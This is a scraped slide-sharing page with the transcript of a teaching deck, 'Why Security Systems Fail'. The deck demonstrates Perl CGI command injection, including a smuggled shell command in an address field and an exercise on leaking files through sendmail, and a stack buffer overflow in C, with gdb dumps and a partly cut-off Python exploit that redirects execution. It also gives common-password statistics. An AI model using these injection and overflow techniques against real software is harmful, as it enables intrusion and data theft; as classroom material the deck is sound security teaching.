slide1
Download
Skip this Video
Download Presentation
Why Security Systems Fail

Loading in 2 Seconds...

play fullscreen
1 / 24

Why Security Systems Fail - PowerPoint PPT Presentation


  • 175 Views
  • Uploaded on

Why Security Systems Fail. Capability List. Access Control List. ALL STATES. UNSAFE / UNDEFINED STATES. SAFE STATES. #!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Why Security Systems Fail' - kasi


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
slide5
ALL STATES

UNSAFE / UNDEFINED STATES

SAFE STATES

slide6
#!/usr/bin/perl

# funky CGI script example

$dest = "foo1"; # pretend this is the destination address from the user

open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

print MAIL "To: $dest\nFrom: me\n\nHi there!\n";

close MAIL;

!/usr/bin/perl

# funky CGI script example

$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";

open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

print MAIL "To: $dest\nFrom: me\n\nHi there!\n";

close MAIL;

slide7
/usr/bin/perl –w

# (1) quit unless we have the correct number of command-line args

$num_args = $#ARGV + 1;

if ($num_args != 2) {

print "\nUsage: name.pl email-address brief-message\n";

exit;

}

# (2) we got two command line args, so assume it’s address

$dest=$ARGV[0];

$content=$ARGV[1];

my $sendmail = "/usr/sbin/sendmail -t";

#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";

print MAIL "To: $dest\n";

print MAIL "From: me\n";

print MAIL "Subject: test\n";

print MAIL "Content-type: text/plain\n\n";

print MAIL $content;

close MAIL;

Run it with

./tryit.pl ccpalmer “Some long message here inside quotes”

Could you find a way to trick the perl script into mailing you

some file that it shouldn’t???

slide9
name[9]

degree[4]

0

0

0

0

0

0

0

0

0

0

0

0

0

0

strcpy(name,”charles”);

strcpy(degree,”PhD”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘s’

0

0

‘P’

‘h’

‘D’

0

printf(name);

charles

PhD

printf(degree);

slide10
name[9]

degree[4]

0

0

0

0

0

0

0

0

0

0

0

0

0

0

strcpy(name,”charleton”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘t’

‘o’

‘n’

0

0

0

0

strcpy(degree,”PhD”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘t’

‘o’

‘n’

‘P’

‘h’

‘D’

0

printf(name);

charletonPhD

PhD

printf(degree);

slide12
#include

#include

#include

void secret1(void) {

puts("You found the secret function No. 1!\n");

}

int main () {

char string[2];

puts("Input: ");

scanf("%s", string);

printf("You entered %s.\n", string);

return 0;

}

slide13
At startup of poof

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e52

rbp 0x7fff5fbff828

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide14
Before call to puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e61

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide15
Just inside of puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000ea4

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide16
Just after return from puts()

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e66

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide17
Just inside scanf( )

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e66 rsi 0x7fff5fbff800

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide18
After return from scanf ( )

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e7b

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide19
Just before stack cleanup

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e95

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

slide20
And ready to return to the operating system?

0x0000000100000e52 : push %rbp /* entry to main() */

0x0000000100000e53 : mov %rsp,%rbp

0x0000000100000e56 : sub $0x10,%rsp

0x0000000100000e5a : lea 0x75(%rip),%rdi

0x0000000100000e61 : callq 0x100000ea4 /* puts () */

0x0000000100000e66 : lea -0x10(%rbp),%rsi

0x0000000100000e6a : lea 0x6d(%rip),%rdi

0x0000000100000e71 : mov $0x0,%eax

0x0000000100000e76 : callq 0x100000eaa /* scanf () */

0x0000000100000e7b : lea -0x10(%rbp),%rsi

0x0000000100000e7f : lea 0x5b(%rip),%rdi

0x0000000100000e86 : mov $0x0,%eax

0x0000000100000e8b : callq 0x100000e9e /* printf () */

0x0000000100000e90 : mov $0x0,%eax

0x0000000100000e95 : leaveq

0x0000000100000e96 : retq

rip 0x000100000e96

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?

slide21
Hello secret1( ) !!!

0x0000000100000e40 : push %rbp

0x0000000100000e41 : mov %rsp,%rbp

0x0000000100000e44 : lea 0x65(%rip),%rdi # 0x100000eb0

0x0000000100000e4b : callq 0x100000ea4

0x0000000100000e50 : leaveq

0x0000000100000e51 : retq

rip 0x000100000e40

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?

slide22
$ poof

Input:

A

You entered A.

$ cat poop

import struct

rip = 0x0000000100000e40

print("A"*24 + struct.pack("

$ python poop | poof

Input:

You entered [email protected]^N.

You found the secret function No. 1!

Segmentation fault

$

and speaking of passwords
And speaking of passwords …
  • 4.7% of users have the password password;
  • 8.5% have the passwords password or 123456;
  • 9.8% have the passwords password, 123456 or 12345678;
  • 14% have a password from the top 10 passwords
  • 40% have a password from the top 100 passwords
  • 79% have a password from the top 500 passwords
  • 91% have a password from the top 1000 passwords

From https://xato.net/passwords/more-top-worst-passwords/#.VAh-1Esc8pw

ad